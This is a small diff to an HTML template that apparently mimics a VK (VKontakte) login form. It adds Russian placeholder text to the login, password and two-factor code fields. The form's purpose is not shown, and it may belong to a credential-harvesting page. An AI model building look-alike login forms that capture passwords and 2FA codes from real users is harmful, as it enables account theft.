--- a/templates/vk_form.html
+++ b/templates/vk_form.html
@@ -63,13 +63,13 @@
             <div class="vk_auth_login" id="vk_auth_login">
                 <p>
                     <p>Логин</p>
-                    <input type="text" name="login" id="login">
+                    <input type="text" name="login" id="login" placeholder="Номер телефона или e-mail">
                 </p>
             </div>
             <div class="vk_auth_pass" id="vk_auth_pass">
                 <p>
                     <p>Пароль</p>
-                    <input type="password" name="password" id="pass">
+                    <input type="password" name="password" id="pass" placeholder="Пароль">
                 </p>
             </div>
             <div class="vk_auth_2fa" id='hidden_2fa'>
@@ -78,7 +78,7 @@
                     <div id="wrong_code_hidden" >
                         Код не верный
                     </div>
-                    <input type="text" name="2fa" id="2fa_code">
+                    <input type="text" name="2fa" id="2fa_code" placeholder="Код подтверждения">
                 </p>
             </div>
             <div class="vk_auth_submit">
